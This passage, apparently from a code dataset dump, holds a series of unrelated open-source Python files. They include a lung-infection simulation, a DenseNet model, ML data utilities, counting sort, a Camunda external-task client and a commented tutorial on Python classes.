pdb.set_trace()
else:
map, map_img_dim, zero_loc = summarize.infection_map_adv(self.infected_coord_dict, self.sim_folder, self.sim, "default", "infection_map_adv")
try:
summarize.write_summary_data(self.cell_li, total_virions, map, map_img_dim, zero_loc, self.sim_folder, self.sim, "summary_data")
except:
print("Error summarizing data!")
pdb.set_trace()
try:
summarize.virus_production_times(self.cell_li, self.sim_folder, self.sim, "viral_load_adv")
except:
print("Error computing viral load!")
pdb.set_trace()
print("Time =", time.time() - a)
class LungParam:
    """Per-generation airway geometry read from a tab-separated parameter file."""

    def __init__(self, param_csv):
        """Load *param_csv* and expose a generation -> length lookup.

        :param param_csv: path to a TSV file with a "Generation" column and
            a "Length (cm)" column.
        """
        # Index the table by airway generation so rows can be looked up by name.
        table = pd.read_csv(param_csv, sep="\t").set_index("Generation")
        self.param_df = table
        # Generation -> airway length in micrometres (the file stores cm).
        self.length = (table["Length (cm)"] * 10000).to_dict()
def main():
    """Run one FullModel simulation per airway generation listed in the CSV."""
    # Physical constants (micrometres / seconds unless noted).
    Dv = 1.27 # um^2/s
    PCL_THICKNESS = 7 # um
    CELL_DIAM = 4 # um
    CIRCUM = 150000 # diameter of nasal passage = 5 cm, so circumference = 50000\pi um
    infection_prob = 0.3
    NUM_VIRUS = 10000
    infectible_perc = 0.5
    virions_per_day = 2000
    num_days = 2.02
    latency_time = 0.5
    virus_at_interface = 0
    restrict_to_gen = False
    MEMORY_CUTOFF = 10000 # simulate in smaller blocks
    MAX_SIM_TIME_kernel = 100000 # usually infects very quickly, so a large number can be chosen
    sim_dir = "Simulations"
    ext = ["py", "pyx"]
    gens_to_sim = ["nasal","0","5","10","15"]
    param_csv = "lung_parameters.csv"
    param_df = pd.read_csv(param_csv, sep = "\t")
    # Keep only the generations selected for this run.
    param_df = param_df[param_df["Generation"].isin(gens_to_sim)]
    lung = LungParam(param_csv)
    for par in range(len(param_df)):
        # Per-generation parameters taken from the CSV row.
        v_adv = param_df.iloc[par]["Advection (mm/min)"]*1000/60 # mm/min -> um/s
        MUCUS_THICKNESS = 0.5*(param_df.iloc[par]["ASL Height (lower, um)"] + param_df.iloc[par]["ASL Height (upper, um)"])
        gen = param_df.iloc[par]["Generation"]
        # Each run gets its own numbered output folder.
        sim_num = write_sim_folder(sim_dir, ext)
        sim_folder = os.path.join(sim_dir, sim_num)
        sim = Simulation(Dv, PCL_THICKNESS, MUCUS_THICKNESS, CELL_DIAM, CIRCUM, \
            infection_prob, NUM_VIRUS, v_adv, infectible_perc, MEMORY_CUTOFF, MAX_SIM_TIME_kernel, \
            virions_per_day, num_days, latency_time, virus_at_interface, gen, restrict_to_gen, lung)
        # Running the model happens entirely inside the constructor.
        FullModel(sim, sim_folder)

if __name__ == "__main__":
    main()
| 2.03125 | 2 |
mne/datasets/mtrf/mtrf.py | fmamashli/mne-python | 1 | 12757388 | # Authors: <NAME> <<EMAIL>>
#
# License: BSD Style.
from functools import partial

from ...utils import verbose
from ..utils import (has_dataset, _data_path, _data_path_doc,
                     _get_version, _version_doc)

# Dataset identifier used by the shared mne.datasets helpers.
data_name = 'mtrf'
# True when the mTRF dataset is already present on disk.
has_mtrf_data = partial(has_dataset, name=data_name)


@verbose
def data_path(path=None, force_update=False, update_path=True, download=True,
              verbose=None):  # noqa: D103
    # Delegate to the generic dataset downloader; the public docstring is
    # attached below from the shared template.
    return _data_path(path=path, force_update=force_update,
                      update_path=update_path, name=data_name,
                      download=download)


data_path.__doc__ = _data_path_doc.format(name=data_name,
                                          conf='MNE_DATASETS_MTRF_PATH')


def get_version():  # noqa: D103
    # Version of the locally installed mTRF dataset (docstring templated below).
    return _get_version(data_name)


get_version.__doc__ = _version_doc.format(name=data_name)
teamgen/stats.py | sharpertool/teamgen | 0 | 12757389 | import logging
from typing import List
import math
import itertools
logger = logging.getLogger(__name__)
class RoundStats:
    """Accumulates per-round score differentials and match-quality samples.

    Fix over the original: ``push_histories`` used truthiness tests
    (``if diff:``), which silently dropped legitimate zero-valued samples;
    it now tests ``is not None``.
    """

    def __init__(self):
        self._diff_history = []
        self._q_history = []

    def push_histories(self, diff=None, q=None):
        """Record a differential and/or a quality sample.

        :param diff: score differential to record (0 is a valid sample)
        :param q: quality value to record (0 is a valid sample)
        """
        if diff is not None:
            self._diff_history.append(diff)
        if q is not None:
            self._q_history.append(q)

    @property
    def diff_history(self):
        # Sentinel [-1] signals "no samples yet" to callers.
        return self._diff_history or [-1]

    @property
    def q_history(self):
        return self._q_history or [-1]

    def get_stats(self):
        """Return (max_diff, min_diff, min_q, max_q) over the recorded samples.

        When a history is empty its defaults are returned instead
        (diff: 0.0/1000.0, q: -1.0/100.0).
        """
        max_diff = 0.0
        min_diff = 1000.0
        maxq = 100.0
        minq = -1.0
        dh = self._diff_history
        qh = self._q_history
        if dh:
            max_diff = max(dh)
            min_diff = min(dh)
        if qh:
            maxq = max(qh)
            minq = min(qh)
        return max_diff, min_diff, minq, maxq

    @property
    def min_diff(self):
        """Smallest recorded differential, or 1000 when none were recorded."""
        if self._diff_history:
            return min(self._diff_history)
        return 1000

    @property
    def max_q(self):
        """Largest recorded quality, or None when none were recorded."""
        if self._q_history:
            return max(self._q_history)
        return None

    @property
    def min_q(self):
        """Smallest recorded quality, or None when none were recorded."""
        if self._q_history:
            return min(self._q_history)
        return None

    @staticmethod
    def print_check_stats():
        print('')

    def __str__(self):
        # NOTE(review): ``self.matches`` is never defined on this class;
        # presumably a subclass supplies it — confirm before calling str().
        return " ".join([str(m) for m in self.matches])

    def __repr__(self):
        return str(self)
| 3.09375 | 3 |
dataloaders/toy.py | StijnVerdenius/Leren-Beslsissen-Help-Classes | 0 | 12757390 | import random
import numpy as np
import torch
from torch.utils import data
from torch.utils.data.dataset import Dataset
"""
Example of how to make your own dataset
"""
class ToyDataSet(Dataset):
    """Synthetic binary-classification dataset of 2-D points.

    Each sample's label is drawn uniformly from {0, 1}; its features are a
    2-D point drawn from N(label, 0.2), so the two classes form two
    separable clusters around (0, 0) and (1, 1).
    """

    def __init__(self, length: int):
        """Generate *length* random (point, label) pairs up front."""
        self.length = length
        # One binary label per sample, then a Gaussian point centred on it.
        self.classes = [random.choice([0, 1]) for _ in range(length)]
        self.data = [np.random.normal(label, 0.2, 2) for label in self.classes]

    def __getitem__(self, item_index):
        """Return one (features, label) pair, both as torch tensors."""
        features = torch.from_numpy(self.data[item_index])
        label = torch.tensor(self.classes[item_index])
        return features, label

    def __len__(self):
        """Number of samples per epoch, independent of batch size."""
        return self.length
def get_toy_loaders(length: int, batch_size: int):
    """Build an 80/20 train/test pair of batched DataLoaders over ToyDataSet.

    :param length: total number of samples split across the two loaders
    :param batch_size: batch size used by both loaders
    :return: (train_loader, test_loader)
    """
    def _make_loader(n_samples: int):
        # Shared DataLoader configuration for both splits.
        return torch.utils.data.DataLoader(
            ToyDataSet(n_samples),
            batch_size=batch_size,
            shuffle=True,
            pin_memory=True,
        )

    return _make_loader(int(length * 0.8)), _make_loader(int(length * 0.2))
| 3.546875 | 4 |
sort/CountingSort.py | LeonKennedy/DataStructureAlgorithm | 0 | 12757391 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Filename: CountingSort.py
# @Author: olenji - <EMAIL>
# @Description: 适用于K比较少的情况
# @Create: 2019-06-13 20:47
# @Last Modified: 2019-06-13 20:47
import array
import random
class CountingSort:
    """Counting sort for non-negative integers smaller than a known bound.

    Suitable when the value range K is small relative to the input size.
    """

    def counting_sort(self, data, n):
        """Return a new array with the elements of *data* in ascending order.

        :param data: ``array('l')`` of ints in the range [0, n)
        :param n: exclusive upper bound on the values (number of buckets)
        :return: a new sorted ``array('l')``; *data* is left untouched
        """
        # Histogram of value frequencies.
        counts = array.array('l', [0] * n)
        for value in data:
            counts[value] += 1
        # Prefix sums: counts[v] becomes the number of elements <= v.
        running = 0
        for bucket in range(n):
            counts[bucket] += running
            running = counts[bucket]
        # Place each element at its final position; the initial fill value
        # is irrelevant because every slot is overwritten.
        output = array.array('l', [20] * len(data))
        for value in data:
            counts[value] -= 1
            output[counts[value]] = value
        return output
def test():
    """Smoke test: sort 100 random ints in [0, 20) and print before/after."""
    max = 20  # NOTE(review): shadows the builtin ``max`` inside this function
    a = [random.randint(0, max - 1) for _ in range(100)]
    data = array.array('l', a)
    print(data)
    bs = CountingSort()
    data = bs.counting_sort(data, n=max)
    print(data)

if __name__ == "__main__":
    test()
| 3.890625 | 4 |
models/densenetBC.py | MLI-lab/candidate_training | 2 | 12757392 | '''DenseNet-BC-100 k=12 adopted from https://github.com/hysts/pytorch_image_classification'''
import torch
import torch.nn as nn
import torch.nn.functional as F
def initialize_weights(m):
    """Weight initialiser for use with ``module.apply``.

    Convolutions get Kaiming-normal (fan-out) weights; batch norms get unit
    gain and zero shift; linear layers get a zero bias. Other module types
    are left untouched.
    """
    if isinstance(m, nn.Conv2d):
        nn.init.kaiming_normal_(m.weight.data, mode='fan_out')
        return
    if isinstance(m, nn.BatchNorm2d):
        m.weight.data.fill_(1)
        m.bias.data.zero_()
        return
    if isinstance(m, nn.Linear):
        m.bias.data.zero_()
class BasicBlock(nn.Module):
    """DenseNet basic unit: BN -> ReLU -> 3x3 conv, concatenated to its input."""

    def __init__(self, in_channels, out_channels, drop_rate):
        super(BasicBlock, self).__init__()
        self.drop_rate = drop_rate
        self.bn = nn.BatchNorm2d(in_channels)
        # 3x3 convolution preserving spatial size (stride 1, padding 1).
        self.conv = nn.Conv2d(in_channels,
                              out_channels,
                              kernel_size=3,
                              stride=1,
                              padding=1,
                              bias=False)

    def forward(self, x):
        out = self.conv(F.relu(self.bn(x), inplace=True))
        if self.drop_rate > 0:
            out = F.dropout(out, p=self.drop_rate,
                            training=self.training, inplace=False)
        # Dense connectivity: stack the new feature maps onto the input.
        return torch.cat([x, out], dim=1)
class BottleneckBlock(nn.Module):
    """DenseNet-BC unit: 1x1 bottleneck conv then 3x3 conv, concatenated to input.

    The 1x1 conv expands to 4 * out_channels intermediate channels before
    the 3x3 conv reduces back to out_channels (the growth rate).
    """

    def __init__(self, in_channels, out_channels, drop_rate):
        super(BottleneckBlock, self).__init__()
        self.drop_rate = drop_rate
        bottleneck_channels = out_channels * 4
        self.bn1 = nn.BatchNorm2d(in_channels)
        # 1x1 "bottleneck" convolution.
        self.conv1 = nn.Conv2d(in_channels,
                               bottleneck_channels,
                               kernel_size=1,
                               stride=1,
                               padding=0,
                               bias=False)
        self.bn2 = nn.BatchNorm2d(bottleneck_channels)
        # 3x3 convolution preserving spatial size.
        self.conv2 = nn.Conv2d(bottleneck_channels,
                               out_channels,
                               kernel_size=3,
                               stride=1,
                               padding=1,
                               bias=False)

    def forward(self, x):
        out = self.conv1(F.relu(self.bn1(x), inplace=True))
        if self.drop_rate > 0:
            out = F.dropout(out, p=self.drop_rate,
                            training=self.training, inplace=False)
        out = self.conv2(F.relu(self.bn2(out), inplace=True))
        if self.drop_rate > 0:
            out = F.dropout(out, p=self.drop_rate,
                            training=self.training, inplace=False)
        # Dense connectivity: stack the new feature maps onto the input.
        return torch.cat([x, out], dim=1)
class TransitionBlock(nn.Module):
    """DenseNet transition: BN -> ReLU -> 1x1 conv, then 2x2 average pooling.

    Compresses the channel count and halves both spatial dimensions.
    """

    def __init__(self, in_channels, out_channels, drop_rate):
        super(TransitionBlock, self).__init__()
        self.drop_rate = drop_rate
        self.bn = nn.BatchNorm2d(in_channels)
        # 1x1 convolution doing the channel compression.
        self.conv = nn.Conv2d(in_channels,
                              out_channels,
                              kernel_size=1,
                              stride=1,
                              padding=0,
                              bias=False)

    def forward(self, x):
        out = self.conv(F.relu(self.bn(x), inplace=True))
        if self.drop_rate > 0:
            out = F.dropout(out, p=self.drop_rate,
                            training=self.training, inplace=False)
        # Halve height and width.
        return F.avg_pool2d(out, kernel_size=2, stride=2)
class Network(nn.Module):
    """DenseNet-BC-100 (growth rate k=12) for 32x32 RGB inputs, 10 classes.

    Configuration is hard-coded to match the reference implementation:
    depth 100, bottleneck blocks, compression rate 0.5, no dropout.
    """

    def __init__(self):
        super(Network, self).__init__()

        input_shape = (1, 3, 32, 32)
        n_classes = 10

        block_type = 'bottleneck'
        depth = 100
        self.growth_rate = 12
        self.drop_rate = 0
        self.compression_rate = 0.5

        assert block_type in ['basic', 'bottleneck']
        if block_type == 'basic':
            # Basic blocks hold one conv each: depth = 3 * n + 4 extra layers.
            block = BasicBlock
            n_blocks_per_stage = (depth - 4) // 3
            assert n_blocks_per_stage * 3 + 4 == depth
        else:
            # Bottleneck blocks hold two convs each, hence the factor 6.
            block = BottleneckBlock
            n_blocks_per_stage = (depth - 4) // 6
            assert n_blocks_per_stage * 6 + 4 == depth

        # Channel counts entering each stage; the first two stages are
        # followed by a compressing transition, the last is not.
        in_channels = [2 * self.growth_rate]
        for index in range(3):
            denseblock_out_channels = int(
                in_channels[-1] + n_blocks_per_stage * self.growth_rate)
            if index < 2:
                transitionblock_out_channels = int(
                    denseblock_out_channels * self.compression_rate)
            else:
                transitionblock_out_channels = denseblock_out_channels
            in_channels.append(transitionblock_out_channels)

        # Stem convolution.
        self.conv = nn.Conv2d(
            input_shape[1],
            in_channels[0],
            kernel_size=3,
            stride=1,
            padding=1,
            bias=False)
        self.stage1 = self._make_stage(in_channels[0], n_blocks_per_stage,
                                       block, True)
        self.stage2 = self._make_stage(in_channels[1], n_blocks_per_stage,
                                       block, True)
        self.stage3 = self._make_stage(in_channels[2], n_blocks_per_stage,
                                       block, False)
        self.bn = nn.BatchNorm2d(in_channels[3])

        # compute conv feature size by tracing a dummy input through the trunk
        with torch.no_grad():
            self.feature_size = self._forward_conv(
                torch.zeros(*input_shape)).view(-1).shape[0]
        self.fc = nn.Linear(self.feature_size, n_classes)

        # initialize weights
        self.apply(initialize_weights)

    def _make_stage(self, in_channels, n_blocks, block, add_transition_block):
        """Build one dense stage of *n_blocks* blocks, plus optional transition."""
        stage = nn.Sequential()
        for index in range(n_blocks):
            # Each block widens the input by one growth rate.
            stage.add_module(
                'block{}'.format(index + 1),
                block(in_channels + index * self.growth_rate, self.growth_rate,
                      self.drop_rate))
        if add_transition_block:
            in_channels = int(in_channels + n_blocks * self.growth_rate)
            out_channels = int(in_channels * self.compression_rate)
            stage.add_module(
                'transition',
                TransitionBlock(in_channels, out_channels, self.drop_rate))
        return stage

    def _forward_conv(self, x):
        """Convolutional trunk: stem, three dense stages, final BN+ReLU, GAP."""
        x = self.conv(x)
        x = self.stage1(x)
        x = self.stage2(x)
        x = self.stage3(x)
        x = F.relu(self.bn(x), inplace=True)
        x = F.adaptive_avg_pool2d(x, output_size=1)
        return x

    def forward(self, x):
        """Return class logits of shape (batch, 10)."""
        x = self._forward_conv(x)
        x = x.view(x.size(0), -1)
        x = self.fc(x)
        return x
| 2.734375 | 3 |
lib/node/utils.py | AnonymouzAuthorz/RevisitingTabularDL | 298 | 12757393 | <reponame>AnonymouzAuthorz/RevisitingTabularDL<gh_stars>100-1000
# Source: https://github.com/Qwicen/node
import contextlib
import gc
import glob
import hashlib
import os
import time
import numpy as np
import requests
import torch
from tqdm import tqdm
def download(url, filename, delete_if_interrupted=True, chunk_size=4096):
    """Save the file at *url* to *filename*, streaming with a progress bar.

    :param url: source URL (fetched with ``requests`` in streaming mode)
    :param filename: destination path, opened in binary-write mode
    :param delete_if_interrupted: remove the partial file on any error
        (the exception is re-raised either way)
    :param chunk_size: bytes per streamed chunk
    :return: *filename* on success
    """
    try:
        with open(filename, "wb") as f:
            print("Downloading {} > {}".format(url, filename))
            response = requests.get(url, stream=True)
            total_length = response.headers.get('content-length')
            if total_length is None: # no content length header
                f.write(response.content)
            else:
                total_length = int(total_length)
                with tqdm(total=total_length) as progressbar:
                    for data in response.iter_content(chunk_size=chunk_size):
                        if data: # filter-out keep-alive chunks
                            f.write(data)
                            progressbar.update(len(data))
    except Exception as e:
        if delete_if_interrupted:
            print("Removing incomplete download {}.".format(filename))
            os.remove(filename)
        raise e
    return filename
def iterate_minibatches(*tensors, batch_size, shuffle=True, epochs=1,
                        allow_incomplete=True, callback=lambda x: x):
    """Yield minibatches drawn in lockstep from one or more same-length tensors.

    :param tensors: one or more indexable arrays/tensors of equal length
    :param batch_size: number of rows per minibatch
    :param shuffle: reshuffle the row order at the start of each epoch
    :param epochs: number of passes over the data (always at least one)
    :param allow_incomplete: if True, a final short batch is yielded
    :param callback: wrapper applied to the batch-start range (e.g. tqdm)
    :yields: a list of per-tensor batches, or the bare batch when only one
        tensor was given
    """
    indices = np.arange(len(tensors[0]))
    rounding = np.ceil if allow_incomplete else np.floor
    upper_bound = int(rounding(len(indices) / batch_size)) * batch_size
    epoch = 0
    while True:
        if shuffle:
            np.random.shuffle(indices)
        for start in callback(range(0, upper_bound, batch_size)):
            chosen = indices[start: start + batch_size]
            batch = [tensor[chosen] for tensor in tensors]
            yield batch if len(tensors) > 1 else batch[0]
        epoch += 1
        if epoch >= epochs:
            break
def process_in_chunks(function, *args, batch_size, out=None, **kwargs):
    """
    Computes output by applying batch-parallel function to large data tensor in chunks
    :param function: a function(*[x[indices, ...] for x in args]) -> out[indices, ...]
    :param args: one or many tensors, each [num_instances, ...]
    :param batch_size: maximum chunk size processed in one go
    :param out: memory buffer for out, defaults to torch.zeros of appropriate size and type
    :returns: function(data), computed in a memory-efficient way
    """
    total_size = args[0].shape[0]
    # Run the first chunk eagerly: its dtype/device/shape define the buffer.
    head = function(*[tensor[0: batch_size] for tensor in args])
    if out is None:
        out = torch.zeros(total_size, *head.shape[1:], dtype=head.dtype,
                          device=head.device, layout=head.layout, **kwargs)
    out[0: batch_size] = head
    for start in range(batch_size, total_size, batch_size):
        window = slice(start, min(start + batch_size, total_size))
        out[window] = function(*[tensor[window] for tensor in args])
    return out
def check_numpy(x):
    """Coerce *x* (torch tensor or array-like) into a numpy ndarray.

    Tensors are detached and moved to CPU first; everything else goes
    through ``np.asarray``.
    """
    if isinstance(x, torch.Tensor):
        x = x.detach().cpu().numpy()
    arr = np.asarray(x)
    assert isinstance(arr, np.ndarray)
    return arr
@contextlib.contextmanager
def nop_ctx():
    """No-op context manager: yields None and does nothing on exit."""
    yield None
def get_latest_file(pattern):
    """Return the most recently created path matching glob *pattern*.

    Raises AssertionError when nothing matches.
    """
    list_of_files = glob.glob(pattern) # * means all if need specific format then *.csv
    assert len(list_of_files) > 0, "No files found: " + pattern
    return max(list_of_files, key=os.path.getctime)
def md5sum(fname):
    """Return the hex MD5 digest of the file at *fname*, read in 4 KiB chunks."""
    digest = hashlib.md5()
    with open(fname, "rb") as fh:
        while True:
            chunk = fh.read(4096)
            if not chunk:
                break
            digest.update(chunk)
    return digest.hexdigest()
def free_memory(sleep_time=0.1):
    """Force garbage collection and release cached GPU memory.

    Fix over the original: the CUDA calls are now guarded by
    ``torch.cuda.is_available()``, so the helper also works on CPU-only
    machines where an unconditional ``torch.cuda.synchronize()`` raises.

    :param sleep_time: seconds to pause at the end (a Jupyter workaround,
        per the original comment)
    """
    gc.collect()
    if torch.cuda.is_available():
        torch.cuda.synchronize()
        gc.collect()
        torch.cuda.empty_cache()
    time.sleep(sleep_time)
def to_float_str(element):
    """Return ``str(float(element))`` when convertible, else *element* unchanged.

    Fix over the original: also catches TypeError, so non-numeric objects
    such as None pass through instead of raising (the original only caught
    ValueError).
    """
    try:
        return str(float(element))
    except (ValueError, TypeError):
        return element
| 2.359375 | 2 |
python/test/mx_test.py | ahmedezzat85/SNPX_ML | 0 | 12757394 | from snpx.snpx_mxnet import SNPXClassifier
import os

# Resolve log and model directories relative to this test script.
LOGS = os.path.join(os.path.dirname(__file__), "..", "log")
MODEL = os.path.join(os.path.dirname(__file__), "..", "model")

# Train a small VGG-style classifier on CIFAR-10 for one epoch on GPU.
classif = SNPXClassifier("mini_vgg", "CIFAR-10", devices=['GPU'],logs_root=LOGS, model_bin_root=MODEL)
classif.train(1)
| 2.015625 | 2 |
ida-service/src/camunda_external_task.py | NovatecConsulting/intelligent-process-automation-showcase | 2 | 12757395 | <reponame>NovatecConsulting/intelligent-process-automation-showcase
import requests
import json
import logging
import time
import uuid
class client:
    """Minimal Camunda external-task worker over the engine's REST API.

    NOTE(review): the fetched task payload is held in module-level globals
    ``body``/``engine`` (set in ``subscribe``, read by every other method),
    so only one task can be held at a time — confirm before using several
    clients concurrently.
    """

    def __init__(self, url, workerid = "defaultid", processInstanceId = ""):
        """
        :param url: base URL of the Camunda REST engine
        :param workerid: id reported to the engine when locking tasks
        :param processInstanceId: filled in once a task has been fetched
        """
        self.url = url
        self.workerid = workerid
        self.processInstanceId = processInstanceId
        logging.basicConfig(level=logging.INFO)

    def subscribe(self, topic, lockDuration = 1000, longPolling = 5000):
        """Fetch-and-lock one task for *topic*, polling until one appears.

        :param topic: external-task topic name to subscribe to
        :param lockDuration: milliseconds the task stays locked to this worker
        :param longPolling: server-side long-poll timeout in milliseconds
        """
        # Define the endpoint for fetch and lock
        endpoint = str(self.url) +"/external-task/fetchAndLock"
        # Define unique ID for the worker
        # global uid
        # uid = uuid.uuid1()
        # uid = str(uid)
        workerid = str(self.workerid)
        # Request payload for fetchAndLock.
        task= {"workerId": workerid,
               "maxTasks":1,
               "usePriority":"true",
               "asyncResponseTimeout": longPolling,
               "topics":
                   [{"topicName": topic,
                     "lockDuration": lockDuration
                     }]
               }
        # Make the request; ``engine`` records whether it was reachable.
        global engine
        engine = True
        try:
            fetch_and_lock = requests.post(endpoint, json=task)
            logging.info(fetch_and_lock.status_code)
            global body
            body = fetch_and_lock.text
            logging.info("body: {}".format(body))
        except Exception as err:
            engine = False
            logging.info("An error occurred during connection to external task".format(err))
        if(engine == True):
            # Poll every 5 s until a task is returned ('[]' means none yet).
            # NOTE(review): if the very first fetch already returned a task,
            # processInstanceId is never set here — confirm intended.
            while body == '[]':
                logging.info("Polling Camunda for External Task")
                fetch_and_lock = requests.post(endpoint, json=task)
                body = fetch_and_lock.text
                time.sleep(5)
                if body != '[]':
                    self.processInstanceId = json.loads(body)[0]["processInstanceId"]
                    break

    # Complete Call
    def complete(self, **kwargs):
        """Complete the fetched task, passing **kwargs as process variables."""
        response_body = json.loads(body)
        taskid = response_body[0]['id']
        taskid = str(taskid)
        endpoint = str(self.url) + "/external-task/" + taskid + "/complete"
        # get workerid
        workerid = response_body[0]['workerId']
        workerid = str(workerid)
        # Put the variables from the dictionary into the nested format the
        # REST API expects: {name: {"value": ...}}.
        variables_for_response = {}
        for key, val in kwargs.items():
            variable_new = {key:{"value": val}}
            variables_for_response.update(variable_new)
        response= {"workerId": workerid,
                   "variables": variables_for_response
                   }
        try:
            complete = requests.post(endpoint, json =response)
            body_complete = complete.text
            logging.info(body_complete)
            logging.info(complete.status_code)
        except:
            logging.info('Completing external task failed')

    # BPMN Error
    def error(self, bpmn_error, error_message = "not defined", **kwargs):
        """Report a BPMN error for the fetched task.

        :param bpmn_error: BPMN error code handled by the process model
        :param error_message: human-readable description
        :param kwargs: process variables to attach, as name=value pairs
        """
        response_body = json.loads(body)
        taskid = response_body[0]['id']
        taskid = str(taskid)
        endpoint = str(self.url) + "/external-task/"+ taskid + "/bpmnError"
        workerid = response_body[0]['workerId']
        workerid = str(workerid)
        variables_for_response = {}
        for key, val in kwargs.items():
            variable_new = {key:{"value": val}}
            variables_for_response.update(variable_new)
        response = {
            "workerId": workerid,
            "errorCode": bpmn_error,
            "errorMessage": error_message,
            "variables": variables_for_response
        }
        try:
            error = requests.post(endpoint, json = response)
            logging.info(error.status_code)
        except:
            logging.info('fail')

    # Create an incident
    def fail(self, error_message, retries = 0, retry_timeout= 0):
        """Mark the fetched task as failed (0 retries creates an incident).

        :param error_message: reason reported to the engine
        :param retries: remaining retries the engine should allow
        :param retry_timeout: milliseconds before the task may be retried
        """
        response_body = json.loads(body)
        taskid = response_body[0]['id']
        taskid = str(taskid)
        endpoint = str(self.url) + "/external-task/"+ taskid + "/failure"
        workerid = response_body[0]['workerId']
        workerid = str(workerid)
        response = {
            "workerId": workerid,
            "errorMessage": error_message,
            "retries": retries,
            "retryTimeout": retry_timeout}
        try:
            fail = requests.post(endpoint, json = response)
            logging.info(fail.status_code)
        except:
            logging.info('fail')

    # New Lockduration
    def new_lockduration(self, new_duration):
        """Extend the lock on the fetched task by *new_duration* milliseconds."""
        response_body = json.loads(body)
        taskid = response_body[0]['id']
        taskid = str(taskid)
        endpoint = str(self.url) + "/external-task/"+ taskid + "/extendLock"
        workerid = response_body[0]['workerId']
        workerid = str(workerid)
        response = {
            "workerId": workerid,
            "newDuration": new_duration
        }
        try:
            newDuration = requests.post(endpoint, json = response)
            logging.info(newDuration.status_code)
            logging.info(workerid)
        except:
            logging.info('fail')
| 2.21875 | 2 |
class FibIterator(object):
    """Iterator yielding the first *n* Fibonacci numbers (0, 1, 1, 2, ...)."""

    def __init__(self, n):
        self.n = n          # how many numbers to produce in total
        self.current = 0    # how many have been produced so far
        self.num1 = 0       # next value to yield
        self.num2 = 1       # the value after that

    def __iter__(self):
        return self

    def __next__(self):
        if self.current >= self.n:
            raise StopIteration
        value = self.num1
        self.num1, self.num2 = self.num2, self.num1 + self.num2
        self.current += 1
        return value
if __name__ == '__main__':
    # Demo: print the first 20 Fibonacci numbers, then collect 10 into a list.
    fib = FibIterator(20)
    for num in fib:
        print(num, end=" ")
    print("\n", list(FibIterator(10)))
| 3.859375 | 4 |
class/class_0.py | sixiaozheng/PythonCodebase | 2 | 12757397 | <reponame>sixiaozheng/PythonCodebase<gh_stars>1-10
"""
类和对象
python 支持面向对象的三大特征:封装、继承和多态
子类继承父类同样可以继承到父类的变量和方法
类中各成员之间的定义顺序没有任何影响,各成员之间可以相互调用。
类变量:属于类本身,定义类本身的状态数据
实例变量:属于对象本身,定义对象包含的状态数据
方法:定义该类的对象的行为或功能实现
python是动态语言,所以类变量,实例变量,方法可以动态增加或删除。
可以在类体中(类变量)或任何地方位新变量赋值来增加变量,
通过del语句删除变量。
创建对象后,对象的作用:
操作对象的实例变量(访问实例变量的值、修改实例变量、添加实例变量、删除实例变量)
调用对象的方法
"""
################################################################
class Person:
    """Demo class: one class variable, two instance variables, two methods."""

    # Class variable: state shared by the class itself.
    hair = 'black'

    def __init__(self, name='Charlie', age=8):
        # Instance variables: per-object state. ``self`` is bound to the
        # object being initialised.
        self.name = name
        self.age = age

    def say(self, content):
        print(content)

    def speech(self, content):
        # Methods can call each other through ``self``.
        self.say(content)
p=Person()
# Read an instance variable.
p.name
print(p.name)
# Modify it.
p.name="zsx"
print(p.name)
# Add a new instance variable on the fly.
p.skills='swimming'
print(p.skills)
# Delete one.
del p.name
################################################################
# Dynamically adding a method to an existing object:
def intro_func(self, content):
    print(content)

from types import MethodType
# MethodType binds intro_func to p, so calls pass p as ``self``.
p.intro = MethodType(intro_func, p)
p.intro("life in everywhere")
################################################################
# ``self`` acts as the object's default reference and can be read like an
# ordinary variable; a method may even use it as its return value.
# Returning ``self`` lets the same method be called in a chain, which
# keeps the code concise.
class ReturnSelf:
    """Demonstrates a fluent API: ``grow`` returns ``self`` so calls chain."""

    def grow(self):
        # Create ``age`` on first use, then increment it on every call.
        self.age = getattr(self, 'age', 0) + 1
        return self
rs = ReturnSelf()
# Five chained calls: each grow() returns the same object.
rs.grow().grow().grow().grow().grow()
print(rs.age)
################################################################
# Class methods and static methods.
# Both are normally called through the class, though instances work too.
# A class method auto-binds its first parameter: ``cls`` receives the
# class itself. A static method binds nothing automatically.
# Plain functions usually suffice; class/static methods shine in special
# situations such as the factory pattern.
class Bird:
    """Demo of @classmethod (auto-binds the class) vs @staticmethod (no binding)."""

    @classmethod
    def fly(cls):
        print('class method', cls)

    @staticmethod
    def info(p):
        print('static method', p)
# Call the class method; the Bird class is bound to the first parameter.
Bird.fly()
# Call the static method; nothing is bound automatically, so the first
# argument must be supplied by hand.
Bird.info('crazyit')
b=Bird()
# Calling fly() on an instance still dispatches through the class, so
# the first parameter is still bound to the Bird class.
b.fly()
# Likewise, info() called on an instance needs its argument explicitly.
b.info('fkit')
################################################################
# @ function decorators:
# 1) the decorated function (B) is passed as argument to the function the
#    @ symbol names (A);
# 2) B is then replaced (decorated) by A's return value.
# Adding logic before/after a function, or on exception, this way is what
# other languages call AOP (Aspect Oriented Programming).
################################################################
# A Python class acts like a namespace: the module lives in the global
# namespace, the class body in the class namespace.
# Class variables are read and modified through the class. Reading one
# through an instance really goes through the class; assigning through an
# instance does NOT modify the class variable — it creates a new instance
# variable instead.
################################################################
# @property turns a method into an attribute-style property.
class Cell:
    """Demo of @property: ``state`` validates on write; ``is_dead`` is read-only."""

    @property
    def state(self):
        # Getter defined by decorating the method with @property.
        return self._state

    @state.setter
    def state(self, value):
        # Setter: any value mentioning 'alive' is normalised to exactly
        # 'alive'; everything else becomes 'dead'.
        self._state = 'alive' if 'alive' in value.lower() else 'dead'

    @property
    def is_dead(self):
        # Getter-only property: effectively read-only.
        return not self._state.lower() == 'alive'
c=Cell()
# Assignment goes through the setter, which normalises the value.
c.state='Alive'
print(c.state)
print(c.is_dead)
################################################################
# Hiding members.
# Python's trick for "hiding" class members: name them with a leading
# double underscore and Python mangles them.
# There is no real access control — names starting with __ are quietly
# rewritten with a _ClassName prefix.
class Test:
    """Name-mangling demo: ``__``-prefixed members become ``_Test__*``."""

    def __init__(self, name, age):
        # Double-underscore names are mangled to _Test__name / _Test__age.
        self.__name, self.__age = name, age

    def __print_info(self):
        # Inside the class body the mangled names resolve normally.
        print(self.__name, self.__age)
# Adding the _Test prefix lets us reach the mangled members directly.
t = Test('as', 3)
print(t._Test__name, t._Test__age)
t._Test__print_info()

# Direct access through the double-underscore names fails: the next three
# statements raise AttributeError at runtime (the demo stops here on
# purpose).
t = Test('as', 3)
print(t.__name, t.__age)
t.__print_info()
################################################################
# 继承
